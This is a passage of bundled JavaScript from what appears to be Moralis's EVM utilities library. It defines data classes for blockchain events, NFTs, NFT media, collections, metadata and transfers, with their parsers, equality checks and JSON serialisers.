         * @example event.blockHash // "0xc9f62f4f6ab505a96c1a84ec2899c6bfd86245ef1effaa689fc997798be763d5"
         */ get: function() {
            return this._data.blockHash;
        },
        enumerable: false,
        configurable: true
    });
    EvmEvent.parse = function(data) {
        return $3dfc2d9370ba0cd1$var$__assign($3dfc2d9370ba0cd1$var$__assign({}, data), {
            chain: $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7.create(data.chain),
            address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(data.address),
            blockNumber: (0, $10891f2cb3e98601$export$d97aa349ed20696).create(data.blockNumber),
            blockTimestamp: (0, $10891f2cb3e98601$export$8b9fef4a5a83984)(data.blockTimestamp),
            data: {
                from: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.data.from, function(from) {
                    return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(from);
                }),
                to: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.data.to, function(to) {
                    return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(to);
                }),
                value: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.data.value, $3dfc2d9370ba0cd1$export$62862bdd1f71aa78.create)
            }
        });
    };
    return EvmEvent;
}();
/**
 * The EvmNftMedia is a representation of an processed NFT media.
 *
 * @category DataType
 */ var $3dfc2d9370ba0cd1$export$e5237d1bf4cd5e83 = /** @class */ function() {
    function EvmNftMedia(data) {
        this._data = EvmNftMedia.parse(data);
    }
    /**
     * Create a new instance of EvmNftMedia from any valid input
     * @param data -  EvmNftMedia instance or valid EvmNftMediaInput
     * @example
     * ```
     * const media = EvmNftMedia.create(data);
     *```
     */ EvmNftMedia.create = function(data) {
        if (data instanceof EvmNftMedia) return data;
        return new EvmNftMedia(data);
    };
    /**
     * Check the equality between two Erc20 medias
     * @param dataA - The first media to compare
     * @param dataB - The second media to compare
     * @example EvmNftMedia.equals(dataA, dataB)
     * @returns true if the medias are equal, false otherwise
     */ EvmNftMedia.equals = function(dataA, dataB) {
        var mediaA = EvmNftMedia.create(dataA);
        var mediaB = EvmNftMedia.create(dataB);
        if (!mediaA.chain.equals(mediaB.chain)) return false;
        if (mediaA.originalMediaUrl !== mediaB.originalMediaUrl) return false;
        return true;
    };
    /**
     * Checks the equality of the current media with another erc20 media
     * @param data - the media to compare with
     * @example media.equals(data)
     * @returns true if the medias are equal, false otherwise
     */ EvmNftMedia.prototype.equals = function(data) {
        return EvmNftMedia.equals(this, data);
    };
    /**
     * @returns a JSON representation of the media.
     * @example media.toJSON()
     */ EvmNftMedia.prototype.toJSON = function() {
        var data = this._data;
        return $3dfc2d9370ba0cd1$var$__assign($3dfc2d9370ba0cd1$var$__assign({}, data), {
            chain: data.chain.toJSON()
        });
    };
    /**
     * @deprecated This method will be removed soon. To format the value, use one of the properties.
     */ EvmNftMedia.prototype.format = function() {
        return this.toJSON();
    };
    Object.defineProperty(EvmNftMedia.prototype, "result", {
        /**
         * @returns all the data without casting it to JSON.
         * @example media.result
         */ get: function() {
            return this._data;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmNftMedia.prototype, "chain", {
        get: function() {
            return this._data.chain;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmNftMedia.prototype, "status", {
        get: function() {
            return this._data.status;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmNftMedia.prototype, "updatedAt", {
        get: function() {
            return this._data.updatedAt;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmNftMedia.prototype, "originalMediaUrl", {
        get: function() {
            return this._data.originalMediaUrl;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmNftMedia.prototype, "category", {
        get: function() {
            return this._data.category;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmNftMedia.prototype, "mimetype", {
        get: function() {
            return this._data.mimetype;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmNftMedia.prototype, "parentHash", {
        get: function() {
            return this._data.parentHash;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmNftMedia.prototype, "mediaCollection", {
        get: function() {
            return this._data.mediaCollection;
        },
        enumerable: false,
        configurable: true
    });
    EvmNftMedia.parse = function(data) {
        return $3dfc2d9370ba0cd1$var$__assign($3dfc2d9370ba0cd1$var$__assign({}, data), {
            chain: $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7.create(data.chain),
            updatedAt: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.updatedAt, function(date) {
                return (0, $10891f2cb3e98601$export$8b9fef4a5a83984)(date);
            })
        });
    };
    return EvmNftMedia;
}();
/**
 * The EvmNft class is a MoralisData that references to a the NFT of the type; Erc721 or Erc1155
 *
 * @category DataType
 */ var $3dfc2d9370ba0cd1$export$29af622dd51db3c5 = /** @class */ function() {
    function EvmNft(data) {
        this._data = EvmNft.parse(data);
    }
    /**
     * Create a new instance of EvmNft from any valid address input
     *
     * @param data - the EvmNftish type
     * @example
     * ```ts
     * const nft = EvmNft.create(data);
     * ```
     * @returns an instance of EvmNft
     */ EvmNft.create = function(data) {
        if (data instanceof EvmNft) return data;
        return new EvmNft(data);
    };
    // TODO: refactor to reduce complexity
    /**
     * Compares two EvmNftish data. verifies that the chain, tokenAddress and owner of values are equal.
     * @param valueA - the first EvmNftish data to compare
     * @param valueB - the second EvmNftish data to compare
     * @returns true if the values are equal, false otherwise
     * @example
     * ```ts
     *  EvmNft.equals(valueA, valueB);
     * ```
     */ // eslint-disable-next-line complexity
    EvmNft.equals = function(valueA, valueB) {
        var nftA = EvmNft.create(valueA);
        var nftB = EvmNft.create(valueB);
        if (!nftA._data.chain.equals(nftB._data.chain)) return false;
        if (!nftA._data.tokenAddress.equals(nftB._data.tokenAddress)) return false;
        // Owners are different between tokens
        if (nftA._data.ownerOf && nftB._data.ownerOf && !nftA._data.ownerOf.equals(nftB._data.ownerOf)) return false;
        // Owner is defined in only one token
        if (nftA._data.ownerOf && !nftB._data.ownerOf || !nftA._data.ownerOf && nftB._data.ownerOf) return false;
        return true;
    };
    /**
     * Compares an EvmNftish data to this EvmNft instance.
     * @param value - the value to compare
     * @returns true if the value is equal to the current instance, false otherwise
     * @example
     * ```ts
     * nft.equals(value);
     * ```
     */ EvmNft.prototype.equals = function(value) {
        return EvmNft.equals(this, value);
    };
    /**
     * Converts the EvmNft instance to a JSON object.
     * @returns JSON object of the EvmNft instance
     * @example `nft.toJSON()`
     */ EvmNft.prototype.toJSON = function() {
        var _b, _c, _d, _e;
        var data = this._data;
        return $3dfc2d9370ba0cd1$var$__assign($3dfc2d9370ba0cd1$var$__assign({}, data), {
            tokenAddress: data.tokenAddress.toJSON(),
            chain: data.chain.toJSON(),
            ownerOf: (_b = data.ownerOf) === null || _b === void 0 ? void 0 : _b.toJSON(),
            blockNumberMinted: (_c = data.blockNumberMinted) === null || _c === void 0 ? void 0 : _c.toString(),
            blockNumber: (_d = data.blockNumber) === null || _d === void 0 ? void 0 : _d.toString(),
            media: (_e = data.media) === null || _e === void 0 ? void 0 : _e.format()
        });
    };
    /**
     * @deprecated This method will be removed soon. To format the value, use one of the properties.
     */ EvmNft.prototype.format = function() {
        return this.toJSON();
    };
    Object.defineProperty(EvmNft.prototype, "result", {
        get: function() {
            return this._data;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmNft.prototype, "chain", {
        /**
         * @returns the NFT chain
         * @example
         * ```
         * nft.chain // EvmChain
         * ```
         */ get: function() {
            return this._data.chain;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmNft.prototype, "contractType", {
        /**
         * @returns the NFT contract type
         * @example
         * ```
         * nft.contractType // "ERC721" | "ERC1155"
         * ```
         */ get: function() {
            return this._data.contractType;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmNft.prototype, "tokenAddress", {
        /**
         * @returns the NFT token address
         * @example
         * ```
         * nft.tokenAddress // EvmAddress
         * ```
         */ get: function() {
            return this._data.tokenAddress;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmNft.prototype, "metadata", {
        /**
         * @returns the NFT metadata
         * @example
         * ```ts
         * nft.metadata
         * // {
         * // name: 'Pancake',
         * // description: 'The dessert series 1',
         * // image: 'ipfs://QmNQFXCZ6LGzvpMW9Q5PWbCrEnLknQrPwr2r8pbQAgzQ9A/4863BD6B-6C92-4B96-BF80-8020B2F7C3A5.jpeg',
         * // }
         * ```
         */ get: function() {
            return this._data.metadata;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmNft.prototype, "tokenUri", {
        /**
         * @returns the NFT token URI
         * @example
         * ```
         * nft.tokenUri // "https://gateway.moralisipfs.com/ipfs/QmajSqgxY3cWBgBeRm38vasJAcTit1kp5EwqVHxszJYgUC/728.json"
         * ```
         */ get: function() {
            return this._data.tokenUri;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmNft.prototype, "tokenHash", {
        /**
         * @returns the NFT token hash
         * @example
         * ```
         * nft.tokenHash // "QmajSqgxY3cWBgBeRm38vasJAcTit1kp5EwqVHxszJYgUC"
         * ```
         */ get: function() {
            return this._data.tokenHash;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmNft.prototype, "name", {
        /**
         * @returns the NFT name
         * @example
         * ```
         * nft.name // "Tether USD"
         * ```
         */ get: function() {
            return this._data.name;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmNft.prototype, "symbol", {
        /**
         * @returns the NFT symbol
         * @example
         * ```
         * nft.symbol // "USDT"
         * ```
         */ get: function() {
            return this._data.symbol;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmNft.prototype, "ownerOf", {
        /**
         * @returns the NFT owner of address
         * @example
         * ```
         * nft.ownerOf // EvmAddress
         * ```
         */ get: function() {
            return this._data.ownerOf;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmNft.prototype, "blockNumberMinted", {
        /**
         * @returns the NFT block number minted from
         * @example
         * ```
         * nft.blockNumberMinted // BigNumber
         * ```
         */ get: function() {
            return this._data.blockNumberMinted;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmNft.prototype, "blockNumber", {
        /**
         * @returns the NFT block number
         * @example
         * ```
         * nft.blockNumber // BigNumber
         * ```
         */ get: function() {
            return this._data.blockNumber;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmNft.prototype, "lastMetadataSync", {
        /**
         * @returns the NFT latest metadata sync date
         * @example
         * ```
         * nft.latestMetadataSync // Date
         * ```
         */ get: function() {
            return this._data.lastMetadataSync;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmNft.prototype, "lastTokenUriSync", {
        /**
         * @returns the NFT latest token URI sync date
         * @example
         * ```
         * nft.latestTokenUriSync // Date
         * ```
         */ get: function() {
            return this._data.lastTokenUriSync;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmNft.prototype, "amount", {
        /**
         * @returns the NFT amount
         * @example
         * ```
         * nft.amount // 2
         * ```
         */ get: function() {
            return this._data.amount;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmNft.prototype, "tokenId", {
        /**
         * @returns the token id
         * @example
         * ```
         * nft.tokenId // '1234'
         * ```
         */ get: function() {
            return this._data.tokenId;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmNft.prototype, "media", {
        /**
         * @returns the processed media of the NFT
         * @example
         * ```
         * nft.media // EvmNftMedia
         * ```
         */ get: function() {
            return this._data.media;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmNft.prototype, "possibleSpam", {
        /**
         * @returns possibility of the token being a spam token
         * @example transfer.possibleSpam // true
         */ get: function() {
            return this._data.possibleSpam;
        },
        enumerable: false,
        configurable: true
    });
    var _a;
    _a = EvmNft;
    EvmNft.parse = function(data) {
        return $3dfc2d9370ba0cd1$var$__assign($3dfc2d9370ba0cd1$var$__assign({}, data), {
            chain: $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7.create(data.chain),
            contractType: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.contractType),
            tokenAddress: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(data.tokenAddress),
            metadata: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.metadata, _a.validateMetadata),
            tokenUri: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.tokenUri),
            tokenHash: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.tokenHash),
            name: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.name),
            symbol: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.symbol),
            ownerOf: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.ownerOf, function(ownerOf) {
                return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(ownerOf);
            }),
            blockNumberMinted: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.blockNumberMinted, (0, $10891f2cb3e98601$export$d97aa349ed20696).create),
            blockNumber: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.blockNumber, (0, $10891f2cb3e98601$export$d97aa349ed20696).create),
            lastMetadataSync: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.lastMetadataSync, (0, $10891f2cb3e98601$export$8b9fef4a5a83984)),
            lastTokenUriSync: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.lastTokenUriSync, (0, $10891f2cb3e98601$export$8b9fef4a5a83984)),
            amount: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.amount, function(value) {
                return +value;
            }),
            media: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.media, function(value) {
                return $3dfc2d9370ba0cd1$export$e5237d1bf4cd5e83.create(value);
            })
        });
    };
    /**
     * This function confirms that the NFT metadata is a valid JSON string.
     *
     * @param value - the new value for the NFT metadata
     * @returns the parsed value of the JSON string
     * @throws {CoreError} if the value is not a valid JSON string
     */ EvmNft.validateMetadata = function(value) {
        try {
            return JSON.parse(value);
        } catch (error) {
            throw new (0, $10891f2cb3e98601$export$11e3a3d7d0a8e488)({
                code: (0, $10891f2cb3e98601$export$643b9db13fb4e195).INVALID_ARGUMENT,
                message: "Invalid metadata provided, cannot parse the value to JSON"
            });
        }
    };
    return EvmNft;
}();
/**
 * The EvmNftCollection is a representation of an nft collection.
 *
 * @category DataType
 */ var $3dfc2d9370ba0cd1$export$74e13a6454c09045 = /** @class */ function() {
    function EvmNftCollection(data) {
        this._data = EvmNftCollection.parse(data);
    }
    /**
     * Create a new instance of EvmNftCollection from any valid transaction input
     * @param data - the EvmNftCollectionish type
     * @example const collection = EvmNftCollection.create(data);
     */ EvmNftCollection.create = function(data) {
        if (data instanceof EvmNftCollection) return data;
        return new EvmNftCollection(data);
    };
    /**
     * Check the equality between two Evm collections. It compares their hashes and collections.
     * @param dataA - The first collection to compare
     * @param dataB - The second collection to compare
     * @example EvmNftCollection.equals(dataA, dataB)
     */ EvmNftCollection.equals = function(dataA, dataB) {
        var collectionA = EvmNftCollection.create(dataA);
        var collectionB = EvmNftCollection.create(dataB);
        if (!collectionA.chain.equals(collectionB.chain)) return false;
        if (!collectionA.tokenAddress.equals(collectionB.tokenAddress)) return false;
        return true;
    };
    /**
     * Checks the equality of the current collection with another evm collection
     * @param data - the collection to compare with
     * @example
     * ```ts
     * collection.equals(data)
     * ```
     */ EvmNftCollection.prototype.equals = function(data) {
        return EvmNftCollection.equals(this, data);
    };
    /**
     * @returns a JSON represention of the collection.
     * @example
     * ```
     * collection.toJSON()
     * ```
     */ EvmNftCollection.prototype.toJSON = function() {
        var data = this._data;
        return $3dfc2d9370ba0cd1$var$__assign($3dfc2d9370ba0cd1$var$__assign({}, data), {
            chain: data.chain.toJSON(),
            tokenAddress: data.tokenAddress.toJSON()
        });
    };
    /**
     * @deprecated This method will be removed soon. To format the value, use one of the properties.
     */ EvmNftCollection.prototype.format = function() {
        return this.toJSON();
    };
    Object.defineProperty(EvmNftCollection.prototype, "result", {
        /**
         * @returns all the data without casting it to JSON.
         * @example collection.result
         */ get: function() {
            return this._data;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmNftCollection.prototype, "chain", {
        /**
         * @returns the chain where the collection is deployed.
         * @example collection.chain // EvmChain
         */ get: function() {
            return this._data.chain;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmNftCollection.prototype, "tokenAddress", {
        /**
         * @returns the token address of collection.
         * @example collection.tokenAddress // EvmAddress
         */ get: function() {
            return this._data.tokenAddress;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmNftCollection.prototype, "contractType", {
        /**
         * @returns the token type of collection.
         * @example collection.tokenAddress // 'ERC721'
         */ get: function() {
            return this._data.contractType;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmNftCollection.prototype, "name", {
        /**
         * @returns the token name of collection.
         * @example collection.tokenAddress // 'Test NFT'
         */ get: function() {
            return this._data.name;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmNftCollection.prototype, "symbol", {
        /**
         * @returns the token symbol of collection.
         * @example collection.symbol // 'TEST'
         */ get: function() {
            return this._data.symbol;
        },
        enumerable: false,
        configurable: true
    });
    EvmNftCollection.parse = function(data) {
        return $3dfc2d9370ba0cd1$var$__assign($3dfc2d9370ba0cd1$var$__assign({}, data), {
            tokenAddress: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(data.tokenAddress),
            chain: $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7.create(data.chain),
            contractType: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.contractType)
        });
    };
    return EvmNftCollection;
}();
/**
 * The EvmNftMetadata contains metadata of an NFT.
 *
 * @category DataType
 */ var $3dfc2d9370ba0cd1$export$fb4c254d0c6233de = /** @class */ function() {
    function EvmNftMetadata(data) {
        this._data = EvmNftMetadata.parse(data);
    }
    /**
     *  Create a new instance of EvmNftMetadata from any valid EvmNftMetadata input
     *
     * @param data - the EvmNftMetadataish type
     * @example
     * ```ts
     * const token = EvmNftMetadataish.create(value);
     * ```
     */ EvmNftMetadata.create = function(data) {
        if (data instanceof EvmNftMetadata) return data;
        return new EvmNftMetadata(data);
    };
    /**
     * Compares two EvmNftMetadata instances. This checks if the chain and tokenAddress of both meatdatas are equal.
     *
     * @param dataA - the first EvmNftMetadataish to compare
     * @param dataB - the second EvmNftMetadataish to compare
     * @returns true if the two EvmNftMetadataData are equal
     * @example
     * ```ts
     * EvmNftMetadata.equals(dataA, dataB);
     * ```
     */ EvmNftMetadata.equals = function(dataA, dataB) {
        var metadataA = EvmNftMetadata.create(dataA);
        var metadataB = EvmNftMetadata.create(dataB);
        if (!metadataA._data.chain.equals(metadataB._data.chain)) return false;
        if (!metadataA._data.tokenAddress.equals(metadataB._data.tokenAddress)) return false;
        return true;
    };
    /**
     * Compares EvmNftMetadata instance to current instance
     *
     * @param data - the EvmNftMetadataish to compare
     * @returns true if the EvmNftMetadataish is equals given metadata
     * @example
     * ```ts
     * metadata.equals(data);
     * ```
     */ EvmNftMetadata.prototype.equals = function(data) {
        return EvmNftMetadata.equals(this, data);
    };
    /**
     * @returns the data as JSON.
     * @example metadata.toJSON();
     */ EvmNftMetadata.prototype.toJSON = function() {
        var data = this._data;
        return $3dfc2d9370ba0cd1$var$__assign($3dfc2d9370ba0cd1$var$__assign({}, data), {
            chain: data.chain.toJSON(),
            tokenAddress: data.tokenAddress.toJSON()
        });
    };
    /**
     * @deprecated This method will be removed soon. To format the value, use one of the properties.
     */ EvmNftMetadata.prototype.format = function() {
        return this.toJSON();
    };
    Object.defineProperty(EvmNftMetadata.prototype, "result", {
        /**
         * @returns all the data without casting it to JSON.
         * @example metadata.result;
         */ get: function() {
            return this._data;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmNftMetadata.prototype, "name", {
        /**
         * @returns the name in the metadata.
         * @example metadata.name; // "Baby Ape Mutant Club"
         */ get: function() {
            return this._data.name;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmNftMetadata.prototype, "symbol", {
        /**
         * @returns the symbol in the metadata.
         * @example metadata.symbol; // "BAMC"
         */ get: function() {
            return this._data.symbol;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmNftMetadata.prototype, "contractType", {
        /**
         * @returns the contract type of the NFT.
         * @example metadata.contractType; // "ERC721"
         */ get: function() {
            return this._data.contractType;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmNftMetadata.prototype, "chain", {
        /**
         * @returns the chain in the metadata.
         * @example metadata.chain; // EvmChain
         */ get: function() {
            return this._data.chain;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmNftMetadata.prototype, "tokenAddress", {
        /**
         * @returns the token address in the metadata.
         * @example metadata.tokenAddress; // EvmAddress
         */ get: function() {
            return this._data.tokenAddress;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmNftMetadata.prototype, "syncedAt", {
        /**
         * @returns the date the metadata was synced.
         * @example metadata.syncedAt; // Date
         */ get: function() {
            return this._data.syncedAt;
        },
        enumerable: false,
        configurable: true
    });
    EvmNftMetadata.parse = function(data) {
        return $3dfc2d9370ba0cd1$var$__assign($3dfc2d9370ba0cd1$var$__assign({}, data), {
            chain: $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7.create(data.chain),
            tokenAddress: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(data.tokenAddress),
            syncedAt: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.syncedAt, (0, $10891f2cb3e98601$export$8b9fef4a5a83984))
        });
    };
    return EvmNftMetadata;
}();
/**
 * The EvmNftTransfer is a representation of a completed NFT transfer.
 *
 * @category DataType
 */ var $3dfc2d9370ba0cd1$export$b04bf5e0fc45755d = /** @class */ function() {
    function EvmNftTransfer(data) {
        this._data = EvmNftTransfer.parse(data);
    }
    /**
     * Create a new instance of EvmNftTransfer from any valid transfer input
     * @param data - the EvmNftTransferish type
     * @example
     * ```
     * const transfer = EvmNftTransfer.create(data);
     *```
     */ EvmNftTransfer.create = function(data) {
        if (data instanceof EvmNftTransfer) return data;
        return new EvmNftTransfer(data);
    };
    /**
     * Check the equality between two NFT transfers. The compares the chain, blockHash, tokenId and logIndex.
     * @param dataA - The first transfer to compare
     * @param dataB - The second transfer to compare
     * @example EvmNftTransfer.equals(dataA, dataB)
     * @returns true if the transfers are equal, false otherwise
     */ EvmNftTransfer.equals = function(dataA, dataB) {
        var transferA = EvmNftTransfer.create(dataA);
        var transferB = EvmNftTransfer.create(dataB);
        if (!transferA.chain.equals(transferB.chain)) return false;
        if (transferA.blockHash !== transferB.blockHash) return false;
        if (transferA.tokenId !== transferB.tokenId) return false;
        if (transferA.logIndex !== transferB.logIndex) return false;
        return true;
    };
    /**
     * Checks the equality of the current transfer instance with another nft transfer
     * @param data - the transfer to compare with
     * @example transaction.equals(data)
     * @returns true if the transfers are equal, false otherwise
     */ EvmNftTransfer.prototype.equals = function(data) {
        return EvmNftTransfer.equals(this, data);
    };
    /**
     * @returns a JSON represention of the transfer.
     * @example
     * ```
     * transfer.toJSON()
     * ```
     */ EvmNftTransfer.prototype.toJSON = function() {
        var data = this._data;
        return $3dfc2d9370ba0cd1$var$__assign($3dfc2d9370ba0cd1$var$__assign({}, data), {
            chain: data.chain.toJSON(),
            fromAddress: data.fromAddress ? data.fromAddress.toJSON() : undefined,
            toAddress: data.toAddress.toJSON(),
            tokenAddress: data.tokenAddress.toJSON(),
            value: data.value ? data.value.format() : undefined,
            operator: data.operator ? data.operator.toJSON() : undefined,
            blockNumber: data.blockNumber.toString()
        });
    };
    /**
     * @returns a JSON represention of the transfer.
     * @example
     * ```
     * transfer.format()
     * ```
     */ EvmNftTransfer.prototype.format = function() {
        return this.toJSON();
    };
    Object.defineProperty(EvmNftTransfer.prototype, "result", {
        /**
         * @returns all the data without casting it to JSON.
         * @example transfer.result
         */ get: function() {
            return this._data;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmNftTransfer.prototype, "chain", {
        /**
         * @returns the chain of the transfer.
         * @example transfer.chain // EvmChain
         */ get: function() {
            return this._data.chain;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmNftTransfer.prototype, "blockHash", {
        /**
         * @returns the block hash of the transfer.
         * @example transfer.blockHash // "0x057Ec652A4F150f7FF94f089A38008f49a0DF88e"
         */ get: function() {
            return this._data.blockHash;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmNftTransfer.prototype, "blockNumber", {
        /**
         * @returns the block number of the transfer.
         * @example transfer.blockNumber // BigNumber
         */ get: function() {
            return this._data.blockNumber;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmNftTransfer.prototype, "blockTimestamp", {
        /**
         * @returns the block timestamp of the transfer.
         * @example transfer.blockTimestamp // Date
         */ get: function() {
            return this._data.blockTimestamp;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmNftTransfer.prototype, "fromAddress", {
        /**
         * @returns the from address of the transfer.
         * @example transfer.fromAddress // EvmAddress
         */ get: function() {
            return this._data.fromAddress;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmNftTransfer.prototype, "toAddress", {
        /**
         * @returns the to address of the transfer.
         * @example transfer.toAddress // EvmAddress
         */ get: function() {
            return this._data.toAddress;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmNftTransfer.prototype, "tokenAddress", {
        /**
         * @returns the token address of the transfer.
         * @example transfer.tokenAddress // EvmAddress
         */ get: function() {
            return this._data.tokenAddress;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmNftTransfer.prototype, "tokenId", {
        /**
         * @returns the token id of the transfer.
         * @example transfer.tokenId // "15"
         */ get: function() {
            return this._data.tokenId;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmNftTransfer.prototype, "amount", {
        /**
         * @returns the amount of the transfer.
         * @example transfer.amount // 1
         */ get: function() {
            return this._data.amount;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmNftTransfer.prototype, "value", {
        /**
         * @returns the value of the transfer.
         * @example transfer.value // EvmNative
         */ get: function() {
            return this._data.value;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmNftTransfer.prototype, "logIndex", {
        /**
         * @returns the log index of the transfer.
         * @example transfer.logIndex // 0
         */ get: function() {
            return this._data.logIndex;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmNftTransfer.prototype, "transactionHash", {
        /**
         * @returns the transaction hash of the transfer.
         * @example transfer.transactionHash // "0x057Ec652A4F150f7FF94f089A38008f49a0DF88e"
         */ get: function() {
            return this._data.transactionHash;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmNftTransfer.prototype, "transactionIndex", {
        /**
         * @returns the transaction index of the transfer.
         * @example transfer.transactionIndex // 123
         */ get: function() {
            return this._data.transactionIndex;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmNftTransfer.prototype, "transactionType", {
        /**
         * @returns the transaction type of the transfer.
         * @example transfer.transactionType // "1"
         */ get: function() {
            return this._data.transactionType;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmNftTransfer.prototype, "operator", {
        /**
         * @returns the operator of the transfer.
         * @example transfer.operator // EvmAddress
         */ get: function() {
            return this._data.operator;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmNftTransfer.prototype, "contractType", {
        /**
         * @returns the contract type of the transfer.
         * @example transfer.contractType // "ERC721"
         */ get: function() {
            return this._data.contractType;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmNftTransfer.prototype, "possibleSpam", {
        /**
         * @returns possibility of the token being a spam token
         * @example transfer.possibleSpam // true
         */ get: function() {
            return this._data.possibleSpam;
        },
        enumerable: false,
        configurable: true
    });
    EvmNftTransfer.parse = function(data) {
        return $3dfc2d9370ba0cd1$var$__assign($3dfc2d9370ba0cd1$var$__assign({}, data), {
            chain: $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7.create(data.chain),
            amount: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.amount, function(amount) {
                return +amount;
            }),
            blockNumber: (0, $10891f2cb3e98601$export$d97aa349ed20696).create(data.blockNumber),
            blockTimestamp: (0, $10891f2cb3e98601$export$8b9fef4a5a83984)(data.blockTimestamp),
            transactionIndex: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.transactionIndex, function(index) {
                return +index;
            }),
            transactionType: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.transactionType),
            fromAddress: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.fromAddress, function(address) {
                return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address);
            }),
            toAddress: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(data.toAddress),
            tokenAddress: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(data.tokenAddress),
            value: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.value, $3dfc2d9370ba0cd1$export$62862bdd1f71aa78.create),
            operator: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.operator, function(operator) {
